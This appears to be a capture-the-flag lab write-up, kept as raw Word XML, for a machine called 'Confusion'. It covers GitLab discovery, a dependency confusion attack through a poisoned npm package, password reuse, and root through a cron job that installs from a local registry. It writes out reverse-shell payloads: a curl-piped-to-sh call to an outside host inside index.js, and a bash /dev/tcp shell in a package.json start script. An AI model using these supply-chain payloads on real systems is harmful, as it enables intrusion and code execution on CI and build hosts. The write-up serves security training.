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CONFUSION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xo5q2x5jw6h"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18odprg1qxqr"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13000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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7kri6fupzoqq"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 we are redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confusion.uhclabs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7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an entry to the hosts file, as shown in the image.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0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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it again, we see the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">welcome page.</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85"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perform directory and file fuzzing.</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5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fuzzing with multiple wordlists, I did not find anything useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Subdomain Enumeration</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6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found a subdomain. Let’s add it to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8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new host:</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6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GitLab is a git-based software repository manager with support for Wiki, issue tracking, and CI/CD. GitLab is similar to GitHub, but it allows developers to store code on their own servers rather than third-party servers.</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an account → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Register now</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90900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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7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5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registering, go to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explore public projects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Administration/internallib</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9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8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6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every 3 minutes it executes a new </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipeline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0"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A pipeline is a group of jobs executed in stages. All jobs in a stage run in parallel (if enough Runners are available), and if they all succeed, the pipeline proceeds to the next stage. If any job fails, the next stage will not run.</w:t>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8"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency Confusion</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Story of a Novel Supply Chain Attack — Alex Birsan</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610</w:t>
        </w:r>
      </w:hyperlink>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recommend reading the following article to understand how the vulnerability works before continuing:</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you are a course student, </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://lp.webhacking.com.br/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is a detailed practical video explaining how this vulnerability works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>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Let’s Go</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download the library to our machine to create a malicious script that will give us a reverse shell.</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6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18288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extract it.</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76"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edit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index.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to insert our malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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luhkkx40e3f" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="95"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nypft1a91l0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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machine has internet access, we will use this site to generate a reverse shell payload in different languages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://reverse-shell.sh/</w:t>
        </w:r>
      </w:hyperlink>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8"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will look like this:</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 exec } = require('child_process');</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exports.command = function(){</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console.log("vert16x");</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exec('/bin/bash -c "curl https://reverse-shell.sh/&lt;IP-VPN&gt;:443|sh"');</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"deu bom";</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increase the library version number. When the pipeline runs again, it will install our malicious library because it has a higher (more updated) version.</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8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0y89pvbofrs" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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4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03400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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publish our library to the npm repository. You need to create an account to publish. Since I had previously published, I was not prompted to log in, but on your first time you must log in.</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 few minutes, in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that it executed our malicious library.</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59200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96"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9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6fhw35mlxe2l" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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82"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/scripts/internallib/.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config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this file reveals the credentials for the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal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95800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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log in to GitLab using this new credential.</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9"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9"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Go to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings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CI/CD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Variables</w:t>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find our first flag there =)</w:t>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73"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h7b2dxvg0yku" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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izbl5hytmtcg" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>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o8dc3oc3ody1" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Reuse</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password found in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to switch users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Lateral movement:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gitlab-runner → internal</w:t>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88"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92"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home directory of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we retrieve our second flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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80"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totv18bjrbqn" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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6C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7yhc7zv4b5hz" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Jobs</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/opt/scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find a script owned by root → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local_check.sh</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75100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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Inspecting the file content, we see it executes:</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Testing if local registry is working!</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/root</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test_name=$(shuf -i 1-100000000 -n 1)</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mkdir $test_name</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$test_name</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npm init -y</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npm install uhclabs_local_check --registry http://0.0.0.0:4873/</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node_modules/uhclabs_local_check/</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npm run start</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rm -rf /root/$test_name/</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interesting part is:</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npm install uhclabs_local_check --registry http://0.0.0.0:4873/</w:t>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this script is executed via cron, we can escalate privileges by uploading a malicious library to the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> local registry. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We use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to confirm whether a cron job is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/DominicBreuker/pspy/releases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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89"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93"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and running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we clearly see that a cron job runs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local_check.sh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every 3 minutes.</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91"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55"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download the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uhclabs_local_check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library to modify it.</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90"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downloading the library, we see the following script inside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package.json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8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032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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"scripts": {</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 "ifconfig; ip; whoami; id; echo OK"</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replace the commands inside </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="97"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/dev/tcp/&lt;IP-VPN&gt;/80 0&gt;&amp;1'</w:t>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 not forget to increase the version number so it installs the updated (malicious) version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">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lvwqomy5vkm6" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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09800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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47fqnullr48a" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local NPM Registry</w:t>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local registry uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verdaccio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8">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How to Set Up a Private NPM Registry Locally</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.bitsrc.io/how-to-set-up-a-private-npm-registry-locally-1065e6790796</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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create a new user in the local registry (anonymous works as well).</w:t>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81"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publishing our malicious library, wait a few minutes. We receive a root shell.</w:t>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read the final flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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71"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headerReference r:id="rId58" w:type="default"/>
